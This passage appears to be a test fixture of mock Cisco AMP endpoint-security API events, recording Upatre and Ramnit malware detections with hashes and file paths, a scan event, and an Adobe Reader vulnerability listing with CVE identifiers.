+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180331452157133000,"timestamp":1610704827,"timestamp_nanoseconds":246000000,"date":"2021-01-15T10:00:27+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6180331452157132810","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"opticare.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\opticare.exe","identity":{"sha256":"fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc","sha1":"f9b02ad8d25157eebdb284631ff646316dc606d5","md5":"b2e15a06b0cca8a926c94f8a8eae3d88"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180331452157133000,"timestamp":1610704827,"timestamp_nanoseconds":168000000,"date":"2021-01-15T10:00:27+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Win.Trojan.Upatre.tht.VRT","detection_id":"6180331452157132809","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"opticare.exe","file_path":"\\\\?\\C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\opticare.exe","identity":{"sha256":"fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc","sha1":"f9b02ad8d25157eebdb284631ff646316dc606d5","md5":"b2e15a06b0cca8a926c94f8a8eae3d88"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180331452157133000,"timestamp":1610704827,"timestamp_nanoseconds":121000000,"date":"2021-01-15T10:00:27+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Win.Trojan.Upatre.tht.VRT","detection_id":"6180331452157132808","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"opticare.exe","file_path":"\\\\?\\C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\opticare.exe","identity":{"sha256":"fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc","sha1":"f9b02ad8d25157eebdb284631ff646316dc606d5","md5":"b2e15a06b0cca8a926c94f8a8eae3d88"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825663781681758000,"timestamp":1610704827,"timestamp_nanoseconds":407000000,"date":"2021-01-15T10:00:27+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Ramnit.A","detection_id":"5825663781681758218","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Ramnit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"a1:ca:cb:a7:03:04"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"qdcuuckk.exe","file_path":"\\\\?\\C:\\Documents and Settings\\Administrator\\Local Settings\\Application Data\\iwkikcbw\\qdcuuckk.exe","identity":{"sha256":"f52bfac9637aea189ec918d05113c36f5bcf580f3c0de8a934fe3438107d3f0c"},"parent":{"process_id":4028,"disposition":"Clean","file_name":"svchost.exe","identity":{"sha256":"2910ebc692d833d949bfd56059e8106d324a276d5f165f874f3fb1b6c613cdd5","sha1":"49083ae3725a0488e0a8fbbe1335c745f70c4667","md5":"27c6d03bcdb8cfeb96b716f3d8be3e18"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825663781681758000,"timestamp":1610704827,"timestamp_nanoseconds":345000000,"date":"2021-01-15T10:00:27+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Ramnit.A","detection_id":"5825663781681758217","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Ramnit","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"a1:ca:cb:a7:03:04"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"Ramnit.exe","file_path":"\\\\?\\C:\\Documents and Settings\\Administrator\\Desktop\\Ramnit.exe","identity":{"sha256":"f52bfac9637aea189ec918d05113c36f5bcf580f3c0de8a934fe3438107d3f0c","sha1":"a7771cd3b99f7201b331323f03e2d596778b610e","md5":"607b2219fbcfbfe8e6ac9d7f3fb8d50e"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825663781681758000,"timestamp":1610704827,"timestamp_nanoseconds":298000000,"date":"2021-01-15T10:00:27+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Ramnit.A","detection_id":"5825663781681758216","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Ramnit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"a1:ca:cb:a7:03:04"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"qdcuuckk.exe","file_path":"\\\\?\\C:\\Documents and Settings\\Administrator\\Start Menu\\Programs\\Startup\\qdcuuckk.exe","identity":{"sha256":"f52bfac9637aea189ec918d05113c36f5bcf580f3c0de8a934fe3438107d3f0c","sha1":"a7771cd3b99f7201b331323f03e2d596778b610e","md5":"607b2219fbcfbfe8e6ac9d7f3fb8d50e"},"parent":{"process_id":4028,"disposition":"Clean","file_name":"svchost.exe","identity":{"sha256":"2910ebc692d833d949bfd56059e8106d324a276d5f165f874f3fb1b6c613cdd5","sha1":"49083ae3725a0488e0a8fbbe1335c745f70c4667","md5":"27c6d03bcdb8cfeb96b716f3d8be3e18"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825663781681758000,"timestamp":1610704827,"timestamp_nanoseconds":267000000,"date":"2021-01-15T10:00:27+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Ramnit.A","detection_id":"5825663781681758215","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Ramnit","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"a1:ca:cb:a7:03:04"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"Ramnit.exe","file_path":"\\\\?\\C:\\Documents and Settings\\Administrator\\Desktop\\Ramnit.exe","identity":{"sha256":"f52bfac9637aea189ec918d05113c36f5bcf580f3c0de8a934fe3438107d3f0c","sha1":"a7771cd3b99f7201b331323f03e2d596778b610e","md5":"607b2219fbcfbfe8e6ac9d7f3fb8d50e"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825663781681758000,"timestamp":1610704827,"timestamp_nanoseconds":189000000,"date":"2021-01-15T10:00:27+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Ramnit.A","detection_id":"5825663781681758214","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Ramnit","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"a1:ca:cb:a7:03:04"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"Ramnit.exe","file_path":"\\\\?\\C:\\Documents and Settings\\Administrator\\Desktop\\Ramnit.exe","identity":{"sha256":"f52bfac9637aea189ec918d05113c36f5bcf580f3c0de8a934fe3438107d3f0c","sha1":"a7771cd3b99f7201b331323f03e2d596778b610e","md5":"607b2219fbcfbfe8e6ac9d7f3fb8d50e"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825663781681758000,"timestamp":1610704827,"timestamp_nanoseconds":173000000,"date":"2021-01-15T10:00:27+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Ramnit.A","detection_id":"5825663781681758213","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Ramnit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"a1:ca:cb:a7:03:04"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"Ramnit.exe","file_path":"\\\\?\\C:\\Documents and Settings\\Administrator\\Desktop\\Ramnit.exe","identity":{"sha256":"f52bfac9637aea189ec918d05113c36f5bcf580f3c0de8a934fe3438107d3f0c","sha1":"a7771cd3b99f7201b331323f03e2d596778b610e","md5":"607b2219fbcfbfe8e6ac9d7f3fb8d50e"},"parent":{"process_id":1604,"disposition":"Clean","file_name":"explorer.exe","identity":{"sha256":"1e675cb7df214172f7eb0497f7275556038a0d09c6e5a3e6862c5e26885ef455","sha1":"9d2bf84874abc5b6e9a2744b7865c193c08d362f","md5":"12896823fb95bfb3dc9b46bcaedc9923"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825663781681758000,"timestamp":1610704827,"timestamp_nanoseconds":17000000,"date":"2021-01-15T10:00:27+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Ramnit.A","detection_id":"5825663781681758212","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Ramnit","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"a1:ca:cb:a7:03:04"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"Ramnit.exe","file_path":"\\\\?\\C:\\Documents and Settings\\Administrator\\Desktop\\Ramnit.exe","identity":{"sha256":"f52bfac9637aea189ec918d05113c36f5bcf580f3c0de8a934fe3438107d3f0c","sha1":"a7771cd3b99f7201b331323f03e2d596778b610e","md5":"607b2219fbcfbfe8e6ac9d7f3fb8d50e"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825663777386791000,"timestamp":1610704826,"timestamp_nanoseconds":970000000,"date":"2021-01-15T10:00:26+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Ramnit.A","detection_id":"5825663777386790915","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Ramnit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"a1:ca:cb:a7:03:04"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"iiwswemtokwvoomr.exe","file_path":"\\\\?\\C:\\Documents and Settings\\Administrator\\Local Settings\\Temp\\iiwswemtokwvoomr.exe","identity":{"sha256":"f52bfac9637aea189ec918d05113c36f5bcf580f3c0de8a934fe3438107d3f0c","sha1":"a7771cd3b99f7201b331323f03e2d596778b610e","md5":"607b2219fbcfbfe8e6ac9d7f3fb8d50e"},"parent":{"process_id":3996,"disposition":"Malicious","file_name":"Ramnit.exe","identity":{"sha256":"f52bfac9637aea189ec918d05113c36f5bcf580f3c0de8a934fe3438107d3f0c","sha1":"a7771cd3b99f7201b331323f03e2d596778b610e","md5":"607b2219fbcfbfe8e6ac9d7f3fb8d50e"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825663777386791000,"timestamp":1610704826,"timestamp_nanoseconds":939000000,"date":"2021-01-15T10:00:26+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Ramnit.A","detection_id":"5825663777386790914","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Ramnit","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"a1:ca:cb:a7:03:04"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"Ramnit.exe","file_path":"\\\\?\\C:\\Documents and Settings\\Administrator\\Desktop\\Ramnit.exe","identity":{"sha256":"f52bfac9637aea189ec918d05113c36f5bcf580f3c0de8a934fe3438107d3f0c","sha1":"a7771cd3b99f7201b331323f03e2d596778b610e","md5":"607b2219fbcfbfe8e6ac9d7f3fb8d50e"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6532892411109048000,"timestamp":1610704826,"timestamp_nanoseconds":487000000,"date":"2021-01-15T10:00:26+00:00","event_type":"Scan Started","event_type_id":554696714,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Exploit_Prevention","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f5:8f:96:c3:53:1c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"scan":{"description":"Flash Scan"}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1490719361000000300,"timestamp":1610704823,"timestamp_nanoseconds":0,"date":"2021-01-15T10:00:23+00:00","event_type":"Vulnerable Application Detected","event_type_id":1107296279,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Low","start_timestamp":1610704823,"start_date":"2021-01-15T10:00:23+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Clean","file_name":"AcroRd32.exe","identity":{"sha256":"825b7b20a913f26641c012f1cb61b81d29033f142ba6c6734425de06432e4f82"}},"vulnerabilities":[{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-3346","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3346"},{"cve":"CVE-2013-2729","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2729"},{"cve":"CVE-2013-3342","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3342"},{"cve":"CVE-2013-3341","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3341"},{"cve":"CVE-2013-2718","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2718"},{"cve":"CVE-2013-2719","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2719"},{"cve":"CVE-2013-2720","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2720"},{"cve":"CVE-2013-2721","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2721"},{"cve":"CVE-2013-2722","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2722"},{"cve":"CVE-2013-2723","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2723"},{"cve":"CVE-2013-2724","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2724"},{"cve":"CVE-2013-2725","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2725"},{"cve":"CVE-2013-2726","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2726"},{"cve":"CVE-2013-2727","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2727"},{"cve":"CVE-2013-2730","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2730"},{"cve":"CVE-2013-2731","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2731"},{"cve":"CVE-2013-2732","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2732"},{"cve":"CVE-2013-2733","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2733"},{"cve":"CVE-2013-2735","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2735"},{"cve":"CVE-2013-2736","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2736"},{"cve":"CVE-2013-3340","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3340"},{"cve":"CVE-2013-3337","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3337"},{"cve":"CVE-2013-3338","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3338"},{"cve":"CVE-2013-3339","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3339"},{"cve":"CVE-2013-0601","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0601"},{"cve":"CVE-2013-0602","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0602"},{"cve":"CVE-2013-0603","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0603"},{"cve":"CVE-2013-0604","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0604"},{"cve":"CVE-2013-0605","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0605"},{"cve":"CVE-2013-0606","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0606"},{"cve":"CVE-2013-0607","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0607"},{"cve":"CVE-2013-0608","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0608"},{"cve":"CVE-2013-0609","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0609"},{"cve":"CVE-2013-0610","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0610"},{"cve":"CVE-2013-0611","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0611"},{"cve":"CVE-2013-0612","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0612"},{"cve":"CVE-2013-0613","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0613"},{"cve":"CVE-2013-0614","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0614"},{"cve":"CVE-2013-0615","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0615"},{"cve":"CVE-2013-0616","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0616"},{"cve":"CVE-2013-0617","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0617"},{"cve":"CVE-2013-0618","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0618"},{"cve":"CVE-2013-0619","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0619"},{"cve":"CVE-2013-0620","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0620"},{"cve":"CVE-2013-0621","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0621"},{"cve":"CVE-2013-0622","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0622"},{"cve":"CVE-2013-0623","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0623"},{"cve":"CVE-2013-0624","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0624"},{"cve":"CVE-2013-0626","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0626"},{"cve":"CVE-2013-1376","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1376"},{"cve":"CVE-2013-2734","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2734"},{"cve":"CVE-2013-0641","score":9.3,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0641"},{"cve":"CVE-2013-0640","score":9.3,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0640"},{"cve":"CVE-2013-0627","score":7.2,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0627"}]}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180331434977264000,"timestamp":1610704823,"timestamp_nanoseconds":798000000,"date":"2021-01-15T10:00:23+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Win.Trojan.Upatre.tht.VRT","detection_id":"6180331434977263623","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"opticare.exe","file_path":"\\\\?\\C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\opticare.exe","identity":{"sha256":"fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc","sha1":"f9b02ad8d25157eebdb284631ff646316dc606d5","md5":"b2e15a06b0cca8a926c94f8a8eae3d88"},"parent":{"process_id":1664,"disposition":"Malicious","file_name":"Fax.exe","identity":{"sha256":"fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc","sha1":"f9b02ad8d25157eebdb284631ff646316dc606d5","md5":"b2e15a06b0cca8a926c94f8a8eae3d88"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180331434977264000,"timestamp":1610704823,"timestamp_nanoseconds":798000000,"date":"2021-01-15T10:00:23+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Win.Trojan.Upatre.tht.VRT","detection_id":"6180331434977263622","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"Fax.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\Documents\\Fax\\Fax.exe","identity":{"sha256":"fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc","sha1":"f9b02ad8d25157eebdb284631ff646316dc606d5","md5":"b2e15a06b0cca8a926c94f8a8eae3d88"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180331434977264000,"timestamp":1610704823,"timestamp_nanoseconds":783000000,"date":"2021-01-15T10:00:23+00:00","event_type":"Threat 